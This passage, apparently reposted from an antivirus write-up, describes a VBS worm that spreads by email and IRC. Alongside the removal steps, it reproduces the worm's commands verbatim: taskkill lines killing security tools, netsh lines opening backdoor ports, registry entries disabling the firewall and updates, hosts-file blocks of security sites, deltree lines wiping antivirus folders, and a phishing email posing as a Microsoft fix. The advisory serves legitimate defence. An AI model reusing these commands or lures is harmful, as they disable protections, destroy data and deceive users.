TC.exe /F @taskkill /IM TCA.exe /F @taskkill /IM TCM.exe /F @taskkill /IM TDS-3.exe /F @taskkill /IM TDS2-NT.exe /F @taskkill /IM TEEKIDS.exe /F @taskkill /IM TFAK.exe /F @taskkill /IM TFAK5.exe /F @taskkill /IM TGBOB.exe /F @taskkill /IM TITANIN.exe /F @taskkill /IM TITANINXP.exe /F @taskkill /IM TRACERT.exe /F @taskkill /IM TRICKLER.exe /F @taskkill /IM TRJSCAN.exe /F @taskkill /IM TRJSETUP.exe /F @taskkill /IM TROJANTRAP3.exe /F @taskkill /IM TSADBOT.exe /F @taskkill /IM TVMD.exe /F @taskkill /IM TVTMD.exe /F @taskkill /IM UNDOBOOT.exe /F @taskkill /IM UPDAT.exe /F @taskkill /IM UPDATE.exe /F @taskkill /IM UPDATE.exe /F @taskkill /IM UPGRAD.exe /F @taskkill /IM UTPOST.exe /F @taskkill /IM VBCMSERV.exe /F @taskkill /IM VBCONS.exe /F @taskkill /IM VBUST.exe /F @taskkill /IM VBWIN9X.exe /F @taskkill /IM VBWINNTW.exe /F @taskkill /IM VCSETUP.exe /F @taskkill /IM VET32.exe /F @taskkill /IM VET95.exe /F @taskkill /IM VETTRAY.exe /F @taskkill /IM VFSETUP.exe /F @taskkill /IM VIR-HELP.exe /F @taskkill /IM VIRUSMDPERSONALFIREWALL.exe /F @taskkill /IM VNLAN300.exe /F @taskkill /IM VNPC3000.exe /F @taskkill /IM VPC32.exe /F @taskkill /IM VPC42.exe /F @taskkill /IM VPFW30S.exe /F @taskkill /IM VPTRAY.exe /F @taskkill /IM VSCAN40.exe /F @taskkill /IM VSCENU6.02D30.exe /F @taskkill /IM VSCHED.exe /F @taskkill /IM VSECOMR.exe /F @taskkill /IM VSHWIN32.exe /F @taskkill /IM VSISETUP.exe /F @taskkill /IM VSMAIN.exe /F @taskkill /IM VSMON.exe /F @taskkill /IM VSSTAT.exe /F @taskkill /IM VSWIN9XE.exe /F @taskkill /IM VSWINNTSE.exe /F @taskkill /IM VSWINPERSE.exe /F @taskkill /IM W32DSM89.exe /F @taskkill /IM W9X.exe /F @taskkill /IM WATCHDOG.exe /F @taskkill /IM WEBDAV.exe /F @taskkill /IM WEBSCANX.exe /F @taskkill /IM WEBTRAP.exe /F @taskkill /IM WFINDV32.exe /F @taskkill /IM WHOSWATCHINGME.exe /F @taskkill /IM WIMMUN32.exe /F @taskkill /IM WIN-BUGSFIX.exe /F @taskkill /IM WIN32.exe /F @taskkill /IM WIN32US.exe /F @taskkill /IM WINACTIVE.exe /F @taskkill /IM WINDOW.exe /F @taskkill /IM WINDOWS.exe /F @taskkill /IM WININETD.exe /F @taskkill /IM WININIT.exe /F @taskkill /IM WININITX.exe /F @taskkill /IM WINLOGIN.exe /F @taskkill /IM WINMAIN.exe /F @taskkill /IM WINNET.exe /F @taskkill /IM WINPPR32.exe /F @taskkill /IM WINRECON.exe /F @taskkill /IM WINSERVN.exe /F @taskkill /IM WINSSK32.exe /F @taskkill /IM WINSTART.exe /F @taskkill /IM WINSTART001.exe /F @taskkill /IM WINTSK32.exe /F @taskkill /IM WINUPDATE.exe /F @taskkill /IM WKUFIND.exe /F @taskkill /IM WNAD.exe /F @taskkill /IM WNT.exe /F @taskkill /IM WRADMIN.exe /F @taskkill /IM WRCTRL.exe /F @taskkill /IM WSBGATE.exe /F @taskkill /IM WUPDATER.exe /F @taskkill /IM WUPDT.exe /F @taskkill /IM WYVERNWORKSFIREWALL.exe /F @taskkill /IM XPF202EN.exe /F @taskkill /IM ZAPRO.exe /F @taskkill /IM ZAPSETUP3001.exe /F @taskkill /IM ZATUTOR.exe /F @taskkill /IM ZONALM2601.exe /F @taskkill /IM ZONEALARM.exe /F @taskkill /IM _AVP32.exe /F @taskkill /IM _AVPCC.exe /F @taskkill /IM _AVPM.exe /F @taskkill /IM CMD.exe /F @taskkill /IM TASKMGR.EXE /F @taskkill /IM NEC.EXE /F Overwrites C:WINDOWSSystem32Firewall.bat with the following lines: @netsh firewall add portopening tcp 7 Echo @netsh firewall add portopening tcp 443 HTTPS @netsh firewall add portopening tcp 445 Echo Request @netsh firewall add portopening tcp 135 File Sharing @netsh firewall add portopening tcp 137 File Sharing @netsh firewall add portopening tcp 139 File Sharing @netsh firewall add portopening tcp 110 POP3 @netsh firewall add portopening tcp 109 POP2 @netsh firewall add portopening tcp 21 FTP @netsh firewall add portopening tcp 20 FTP-Data @netsh firewall add portopening tcp 25 SMTP @netsh firewall add portopening tcp 23 Telnet @netsh firewall add portopening tcp 22 SSH @netsh firewall add portopening tcp 80 HTTP @netsh firewall add portopening tcp 8080 HTTP Proxy @netsh firewall add portopening tcp 5554 Backdoor @netsh firewall add portopening tcp 1080 Proxy @netsh firewall add portopening tcp 3389 Remote Destop @netsh firewall add portopening tcp 4899 Remote Administrator @netsh firewall add portopening tcp 5800 VNC @netsh firewall add portopening tcp 5900 VNC @netsh firewall add portopening tcp 6667 Backdoor @netsh firewall add portopening tcp 42 WINS @netsh firewall add portopening tcp 256 Firewall @netsh firewall add portopening tcp 257 Firewall @netsh firewall add portopening tcp 259 Firewall @netsh firewall add portopening tcp 70 gopher @netsh firewall add portopening tcp 79 Finger @netsh firewall add portopening tcp 53 DNS @netsh firewall add portopening tcp 258 Firewall @netsh firewall add portopening tcp 1745 PPTP @netsh firewall add portopening tcp 1723 PPTP @netsh firewall add portopening udp 69 UDP @netsh firewall add portopening udp 53 DNS Server @netsh firewall add portopening udp 1810 IAS @netsh firewall add portopening udp 1811 IAS Adds the values: "WINLOGON" = "wscript.exe C:WindowsSystem32WINLOGON.vbs %" "Tasmgr" = "C:WINDOWSSystem32Taskmgr.bat" "Firewall" = "C:WINDOWSSystem32Firewall.bat" to the registry subkey: HKEY_LOCAL_MACHINESOFTWAREMicrosoftWindows NTCurrentVersionRun so that the worm and the modified .bat files are executed every time Windows starts. Adds the value: "Event17" = "dcc send $nick C:VircSexy Girls.mpg.vbs" to the registry subkey: HKEY_CURRENT_USER.DefaultSoftwareMeGaLiTh SoftwareVisual IRC 96Events to allow it to spread through IRC channels. Adds the values: "1" = "regedit.exe" "2" = "regedt32.exe" "3" = "taskmgr.exe" "4" = "wuauclt1.exe" "5" = "wuauclt.exe" "6" = "wupdmgr.exe" "7" = "vptray.exe" "8" = "wupdmgr.exe" "9" = "vpc32.exe" "10" = "LUAll.exe" to the registry subkey: HKEY_CURRENT_USERSoftwareMicrosoftWindowsCurrentVersionPoliciesExplorerDisallowRun to lower the security settings and disable some security-related programs. Adds the values: "1" = "regedit.exe" "2" = "regedt32.exe" "3" = "taskmgr.exe" "4" = "wuauclt1.exe" "5" = "wuauclt.exe" "6" = "wupdmgr.exe" "7" = "vptray.exe" "8" = "wupdmgr.exe" "9" = "vpc32.exe" "10" = "LUAll.exe" to the registry subkey: HKEY_CURRENT_USERSoftwareMicrosoftWindowsCurrentVersionPoliciesExplorerDisallowRun to lower the security settings and disable some security-related programs. Adds the values: "DisableRegistryTools" = "1" "DisableTaskMgr" = "1" "NoVirtMemPage" = "1" to the subkey: HKEY_CURRENT_USERSoftwareMicrosoftWindowsCurrentVersionPoliciesSystem to disable some security-related programs. Adds the values: "FirewallDisableNotify" = "1" "FirewallOverride" = "1" "UpdatesDiasbleNotify" = "1" "AntivirusDisableNotify" = "1" to the registry subkey: HKEY_LOCAL_MACHINESOFTWAREMicrosoftSecurity Center to lower the security settings. Adds the value: "Disabled = "1" to the subkey: HKEY_CURRENT_USERSoftwareMicrosoftWindowsCurrentVersionPoliciesWinOldApp Adds the value: "NoControlPanel" = "1" to the subkey: HKEY_CURRENT_USERSoftwareMicrosoftWindowsCurrentVersionPoliciesExplorer Adds the value: "WinStationsDisabled" ="1" to the subkey: HKEY_LOCAL_MACHINESOFTWAREMicrosoftWindows NTCurrentVersionWinlogon Adds the value: "AUOptions = "1" to the subkey: HKEY_LOCAL_MACHINESoftwareMicrosoftWindowsCurrentVersionWindowsUpdateAuto Update Adds the value: "DomainProfile" = "1" to the subkey: HKEY_LOCAL_MACHINESoftwarePoliciesMicrosoftWindowsFirewall Adds the value: "EnableFirewall" = "1" to the subkey: HKEY_LOCAL_MACHINESoftwarePoliciesMicrosoftWindowsFirewallStandardProfile Adds the values: "DisableNotifications" = "1" "EnableFirewall" = "0" to the subkey: HKEY_LOCAL_MACHINESYSTEMControlSet001ServicesSharedAccessParametersFirewallPolicyStandardProfile Adds the value: "ServiceUpgrade" = "0" to the subkey: HKEY_LOCAL_MACHINESYSTEMControlSet001ServicesSharedAccessSetup Adds the value: "wscsvc" = "4" to the subkey: HKEY_LOCAL_MACHINESystemCurrentControlSetServices Adds the value: "Start" = "4" to the subkey: HKEY_LOCAL_MACHINESYSTEMCurrentControlSetServicesShareAccess Deletes the following registry entry: HKEY_LOCAL_MACHINESYSTEMControlSet001ServicesHTTPFilterParametersdescription Uses Microsoft Outlook to send itself to all the contacts in Windows Address Book. The email has the following characteristics: Subject: Your Microsoft Firewall Help Message Body: Microsoft found a problem in your last update with your Windows Firewall. To fix the problem you must install the attached file. Microsoft (R) http://windowsupdate.microsoft.com Attachment: WINLOGON.vbs If MIRC is installed on the compromised computer, the worm modifies the script.ini file so that the file c:windowssystemporno.vbs is sent to all other users on the IRC channel. Modifies all files with the extension .iis in C:WindowsInf by adding the following text: Source: C:WINDOWSSystem32WINLOGON.vbs; DestDir: {app}; Flags: ignoreversion Attempts to shut down computers with the following IP addresses: 192.168.1.15 192.168.1.16 192.168.1.17 192.168.1.18 192.168.1.19 192.168.1.20 192.168.1.21 192.168.1.22 192.168.1.23 192.168.1.24 192.168.1.25 192.168.1.26 192.168.1.27 192.168.1.28 192.168.1.29 192.168.1.30 192.168.1.31 192.168.1.32 192.168.1.33 192.168.1.34 192.168.1.35 192.168.1.36 192.168.1.37 192.168.1.38 192.168.1.39 192.168.1.40 192.168.1.41 192.168.1.42 192.168.1.43 192.168.1.44 192.168.1.45 192.168.1.46 192.168.1.47 192.168.1.101 192.168.1.102 192.168.1.103 192.168.1.104 192.168.1.105 192.168.1.106 192.168.1.107 192.168.1.108 192.168.1.109 192.168.1.111 192.168.1.112 192.168.1.113 192.168.1.114 192.168.1.115 192.168.1.116 192.168.1.117 192.168.1.118 192.168.1.119 192.168.1.120 192.168.15.100 192.168.15.101 192.168.15.102 192.168.15.103 192.168.15.104 192.168.15.105 192.168.15.106 192.168.15.107 192.168.15.108 192.168.15.109 192.168.15.111 192.168.15.112 192.168.15.113 192.168.15.114 192.168.15.115 192.168.15.116 192.168.15.117 192.168.15.118 192.168.15.119 192.168.15.120 Add the following text to the C:WINDOWSsystem32driversetchosts file to prevent access to several Web sites, some of which may be security-related: 127.0.0.1 www.symantec.com 127.0.0.1 securityresponse.symantec.com 127.0.0.1 symantec.com 127.0.0.1 www.sophos.com 127.0.0.1 sophos.com 127.0.0.1 www.mcafee.com 127.0.0.1 mcafee.com 127.0.0.1 liveupdate.symantecliveupdate.com 127.0.0.1 www.viruslist.com 127.0.0.1 viruslist.com 127.0.0.1 viruslist.com 127.0.0.1 f-secure.com 127.0.0.1 www.f-secure.com 127.0.0.1 kaspersky.com 127.0.0.1 kaspersky-labs.com 127.0.0.1 www.avp.com 127.0.0.1 www.kaspersky.com 127.0.0.1 avp.com 127.0.0.1 www.networkassociates.com 127.0.0.1 networkassociates.com 127.0.0.1 www.ca.com 127.0.0.1 ca.com 127.0.0.1 mast.mcafee.com 127.0.0.1 my-etrust.com 127.0.0.1 www.my-etrust.com 127.0.0.1 download.mcafee.com 127.0.0.1 dispatch.mcafee.com 127.0.0.1 secure.nai.com 127.0.0.1 nai.com 127.0.0.1 www.nai.com 127.0.0.1 update.symantec.com 127.0.0.1 updates.symantec.com 127.0.0.1 us.mcafee.com 127.0.0.1 liveupdate.symantec.com 127.0.0.1 customer.symantec.com 127.0.0.1 rads.mcafee.com 127.0.0.1 trendmicro.com 127.0.0.1 www.trendmicro.com 127.0.0.1 www.grisoft.com 127.0.0.1 www.microsoft.com 127.0.0.1 microsoft.com 127.0.0.1 www.msn.com 127.0.0.1 www.virustotal.com 127.0.0.1 virustotal.com 127.0.0.1 www.oxyd.fr 127.0.0.1 oxyd.fr 127.0.0.1 www.t35.com 127.0.0.1 t35.com 127.0.0.1 www.t35.net 127.0.0.1 t35.net 127.0.0.1 www.norton.com 127.0.0.1 www.sarc.com 127.0.0.1 downloads-us1.kaspersky-labs.com 127.0.0.1 updates1.kaspersky-labs.com 127.0.0.1 updates2.kaspersky-labs.com 127.0.0.1 updates3.kaspersky-labs.com 127.0.0.1 downloads1.kaspersky-labs.com 127.0.0.1 downloads2.kaspersky-labs.com 127.0.0.1 downloads3.kaspersky-labs.com 127.0.0.1 ftp.downloads1.kaspersky-labs.com 127.0.0.1 ftp.downloads2.kaspersky-labs.com 127.0.0.1 ftp.downloads3.kaspersky-labs.com 127.0.0.1 ftp.symantec.com 127.0.0.1 windowsupdate.microsoft.com 127.0.0.1 officeupdate.microsoft.com 127.0.0.1 www.kddi.de 127.0.0.1 www.uni-cert.nl 127.0.0.1 www.sarc.com 127.0.0.1 www.thesecure.net 127.0.0.1 www.downloads.com 127.0.0.1 www.spacelink.com.au 127.0.0.1 www.akonix.com 127.0.0.1 www.linknet.com.au 127.0.0.1 www.techzoom.net 127.0.0.1 content.tibs.at 127.0.0.1 www.corsaire.com 127.0.0.1 jp.fujitsu.com 127.0.0.1 www.tmsr.net 127.0.0.1 www.kp24.de 127.0.0.1 www.headliner.org 127.0.0.1 newsflash.nifty.com 127.0.0.1 www.cjmtechs.com 127.0.0.1 www.yuikee.com.hk 127.0.0.1 www.hackzona.ru 127.0.0.1 www.xpect.ch 127.0.0.1 computers.yahoo.co.jp 127.0.0.1 kuro.nobody.jp 127.0.0.1 citadelle.intrinsec.com 127.0.0.1 computer.msn.co.jp 127.0.0.1 www.south.rit.ac.th 127.0.0.1 d.hatena.ne.jp 127.0.0.1 www.oct-net.ne.jp 127.0.0.1 bbs.whnet.edu.cn 127.0.0.1 www.tac.cz 127.0.0.1 omakase.jp 127.0.0.1 stats.epiknet.org 127.0.0.1 www.alter-net.com 127.0.0.1 sid.softek.co.jp 127.0.0.1 news.goo.ne.jp 127.0.0.1 www.fken.ise.osaka-sandai.ac.jp 127.0.0.1 www.rolan.si 127.0.0.1 www.searchready.co.uk 127.0.0.1 192.168.1.1 127.0.0.1 192.168.15.1 Runs the file C:WINDOWSSystem32Firewall.bat. Displays a message box containing the following text: Title: Firewall Update Message body: Install Successful. =============================================== To delete the value from the registry Click Start > Run. Type regedit Click OK. Navigate to the subkey: HKEY_LOCAL_MACHINESOFTWAREMicrosoftWindows NTCurrentVersionRun In the right pane, delete the values: "WINLOGON" = "wscript.exe C:WindowsSystem32WINLOGON.vbs %" "Tasmgr" = "C:WINDOWSSystem32Taskmgr.bat" "Firewall" = "C:WINDOWSSystem32Firewall.bat" Navigate to the subkey: HKEY_CURRENT_USER.DefaultSoftwareMeGaLiTh SoftwareVisual IRC 96Events In the right pane, delete the values: "Event17" = "dcc send $nick C:VircSexy Girls.mpg.vbs" Navigate to the subkey: HKEY_CURRENT_USERSoftwareMicrosoftWindowsCurrentVersionPoliciesExplorerDisallowRun In the right pane, delete the values: "1" = "regedit.exe" "2" = "regedt32.exe" "3" = "taskmgr.exe" "4" = "wuauclt1.exe" "5" = "wuauclt.exe" "6" = "wupdmgr.exe" "7" = "vptray.exe" "8" = "wupdmgr.exe" "9" = "vpc32.exe" "10" = "LUAll.exe" Navigate to the subkey: HKEY_CURRENT_USERSoftwareMicrosoftWindowsCurrentVersionPoliciesSystem In the right pane, delete the values: "DisableTaskMgr" = "1" "NoVirtMemPage" = "1" Navigate to the subkey: HKEY_CURRENT_USERSoftwareMicrosoftWindowsCurrentVersionPoliciesWinOldApp In the right pane, delete the value: "Disabled = "1" Exit the Registry Editor. 6. To edit the Autoexec.bat file If you are running Windows 95/98/Me, follow these steps: The function you perform depends on your operating system: Windows 95/98: Go to step B. Windows Me: If you are running Windows Me, the Windows Me file-protection process may have made a backup copy of the Autoexec.bat file that you need to edit. If this backup copy exists, it will be in the C:WindowsRecent folder. Symantec recommends that you delete this file before continuing with the steps in this section. To do this: Start Windows Explorer. Browse to and select the C:WindowsRecent folder. In the right pane, select the Autoexec.bat file and delete it. Click Start, and then click Run. Type the following, and then click OK. edit c:autoexec.bat Delete the following lines: @deltree/y c:antiba~1*.* >nul @deltree/y c:antiba~2*.* >nul @deltree/y c:antiba~1.1*.* >nul @deltree/y c:antiba~1.2*.* >nul @deltree/y c:antiba~1.3*.* >nul @deltree/y c:antiba~1.4*.* >nul @deltree/y c:antiba~1.5*.* >nul @deltree/y c:antiba~1.6*.* >nul @deltree/y c:antiba~1.7*.* >nul @deltree/y c:antiba~1.8*.* >nul @deltree/y c:antivi~1*.* >nul @deltree/y c:antivi~2*.* >nul @deltree/y c:antiviru*.* >nul @deltree/y c:avg*.* >nul @deltree/y c:avp*.* >nul @deltree/y c:avp30*.* >nul @deltree/y c:avx*.* >nul @deltree/y c:avpers~1*.* >nul @deltree/y c:itdef~1*.* >nul @deltree/y c:itdef~2*.* >nul @deltree/y c:comman~1*.* >nul @deltree/y c:cleancih*.* >nul @deltree/y c:esafen*.* >nul @deltree/y c:findvi~1*.* >nul @deltree/y c:f-macro*.* >nul @deltree/y c:f-prot*.* >nul @deltree/y c:f-prot95*.* >nul @deltree/y c:f-secu~1*.* >nul @deltree/y c:fwin*.* >nul @deltree/y c:fwin32*.* >nul @deltree/y c:inocul~1*.* >nul @deltree/y c:inocul~2*.* >nul @deltree/y c:kasper~1*.* >nul @deltree/y c:kasper~2*.* >nul @deltree/y c:mcafee*.* >nul @deltree/y c:mcafee~1*.* >nul @deltree/y c:msav*.* >nul @deltree/y c: orman*.* >nul @deltree/y c: orton~1*.* >nul @deltree/y c: orton~2*.* >nul @deltree/y c:pav*.* >nul @deltree/y c:pccill~1*.* >nul @deltree/y c:pc-cil~1*.* >nul @deltree/y c: av*.* >nul @deltree/y c:softwin*.* >nul @deltree/y c: bav*.* >nul @deltree/y c: bavw95*.* >nul @deltree/y c: oolkit*.* >nul @deltree/y c: rendm~1*.* >nul @deltree/y c: rex*.* >nul @deltree/y c:virus*.* >nul @deltree/y c:vpc*.* >nul @deltree/y c:vs95*.* >nul @deltree/y c:zonela~1*.* >nul @deltree/y c:zonela~2*.* >nul @deltree/y c:progra~1antiba~1*.* >nul @deltree/y c:progra~1antiba~2*.* >nul @deltree/y c:progra~1antiba~1.1*.* >nul @deltree/y c:progra~1antiba~1.2*.* >nul @deltree/y c:progra~1antiba~1.3*.* >nul @deltree/y c:progra~1antiba~1.4*.* >nul @deltree/y c:progra~1antiba~1.5*.* >nul @deltree/y c:progra~1antiba~1.6*.* >nul @deltree/y c:progra~1antiba~1.7*.* >nul @deltree/y c:progra~1antiba~1.8*.* >nul @deltree/y c:progra~1antivi~1*.* >nul @deltree/y c:progra~1antivi~2*.* >nul @deltree/y c:progra~1avg*.* >nul @deltree/y c:progra~1avp*.* >nul @deltree/y c:progra~1avx*.* >nul @deltree/y c:progra~1avx2000*.* >nul @deltree/y c:progra~1avpers~1*.* >nul @deltree/y c:progra~1itdef~1*.* >nul @deltree/y c:progra~1itdef~2*.* >nul @deltree/y c:progra~1comman~1*.* >nul @deltree/y c:progra~1common~1avpsha~1*.* >nul @deltree/y c:progra~1common~1symant~1*.* >nul @deltree/y c:progra~1datafe~1*.* >nul @deltree/y c:progra~1deerfi~1.com*.* >nul @deltree/y c:progra~1f-prot*.* >nul @deltree/y c:progra~1f-prot95*.* >nul @deltree/y c:progra~1findvi~1*.* >nul @deltree/y c:progra~1f-secu~1*.* >nul @deltree/y c:progra~1f-secure*.* >nul @deltree/y c:progra~1fsi*.* >nul @deltree/y c:progra~1fwin*.* >nul @deltree/y c:progra~1fwin32*.* >nul @deltree/y c:progra~1grisoft*.* >nul @deltree/y c:progra~1inocul~1*.* >nul @deltree/y c:progra~1inocul~2*.* >nul @deltree/y c:progra~1intern~2*.* >nul @deltree/y c:progra~1kasper~1*.* >nul @deltree/y c:progra~1kasper~2*.* >nul @deltree/y c:progra~1mcafee*.* >nul @deltree/y c:progra~1mcafee~1*.* >nul @deltree/y c:progra~1mindso~1*.* >nul @deltree/y c:progra~1 orman*.* >nul @deltree/y c:progra~1 orton~1*.* >nul @deltree/y c:progra~1 orton~2*.* >nul @deltree/y c:progra~1pandas~1*.* >nul @deltree/y c:progra~1protec~1*.* >nul @deltree/y c:progra~1protec~2*.* >nul @deltree/y c:progra~1quickh~1*.* >nul @deltree/y c:progra~1 av*.* >nul @deltree/y c:progra~1signal9*.* >nul @deltree/y c:progra~1softwin*.* >nul @deltree/y c:progra~1spysto~1*.* >nul @deltree/y c:progra~1symant~1*.* >nul @deltree/y c:progra~1 bav*.* >nul @deltree/y c:progra~1 inype~1*.* >nul @deltree/y c:progra~1 rendm~1*.* >nul @deltree/y c:progra~1 rendp~1*.* >nul @deltree/y c:progra~1 rojan~1*.* >nul @deltree/y c:progra~1 rojan~2*.* >nul @deltree/y c:progra~1virusm~1.0*.* >nul @deltree/y c:progra~1zonela~1*.* >nul @deltree/y c:progra~1zonela~2*.* >nul Click File, and then click Save. Click File, and then click Exit. 7. To restore the Windows Security Center This threat attempts to disable the features in the Windows Security Center, available in Windows XP Service Pack 2. If you are running Windows XP Service Pack 2 and would like to restore the full functionality of the Windows Security Center, please complete the following steps: Important: If your computer is connected to a domain, you may not be able to adjust these settings. If so, contact your network administrator for more information. Click Start > Control Panel. Double-click the Security Center. In the right pane, click Windows Firewall. The Windows Firewall appears. Select On. Click OK to close the Windows Firewall. In the left pane of the Security Center, select Change the way Security Center alerts me. Click Alert Settings. Select Alert Settings, Firewall, and Virus Protection. Click OK Click Automatic Updates. Select Automatic. Click OK. Exit the Security Center. 8. To reenable the SharedAccess service (Windows 2000/XP only) The SharedAccess service is responsible for maintaining Internet Connection Sharing and the Windows Firewall/Internet Connection Firewall applications in Windows. (The presence and names of these applications vary depending on the operating system and service pack you are using.) To protect your computer and maintain network functionality, re-enable this service if you are using any of these programs. Windows XP Service Pack 2 If you are running Windows XP with Service Pack 2 and are using the Windows Firewall, the operating system will alert you when the SharedAccess service is stopped, by displaying an alert balloon saying that your Firewall status is unknown. Perform the following steps to ensure that the Windows Firewall is re-enabled: Click Start > Control Panel. Double-click the Security Center. Ensure that the Firewall security essential is marked ON. Note: If the Firewall security essential is marked on, your Windows Firewall is on and you do not need to continue with these steps. If the Firewall security essential is not marked on, click the "Recommendations" button. Under "Recommendations," click Enable Now. A window appears telling you that the Windows Firewall was successfully turned on. Click Close, and then click OK. Close the Security Center. Windows 2000 or Windows XP Service Pack 1 or earlier Complete the following steps to re-enable the SharedAccess service: Click Start > Run. Type services.msc Then click OK. Do one of the following: Windows 2000: Under the Name column, locate the "Internet Connection Sharing (ICS)" service and double-click it. Windows XP: Under the Named column, locate the "Internet Connection Firewall (ICF) / Internet Connection Sharing (ICS)" service and double-click it. Under "Startup Type:", select "Automatic" from the drop-down menu. Under "Service Status:", click the Start button. Once the service has completed starting, click OK. Close the Services window. ================================================================   < Prev   Next > [ Back ]

Main Menu SpamAlerts | Windows | Linux | Tutorials | Excell | WhitePapers | News | Spam | Virus Windows Focus VNews Vulnerability Hacking Sql Injection map Downloads Affiliates Online Store Free Ringtones Seo Directory IWebListin Jobs in India Freshers Jobs listings. Winkeyfinder

Copyright 2005-2007 SpamAlertz.com, Content on this site is From variuos other emails, and Advisories.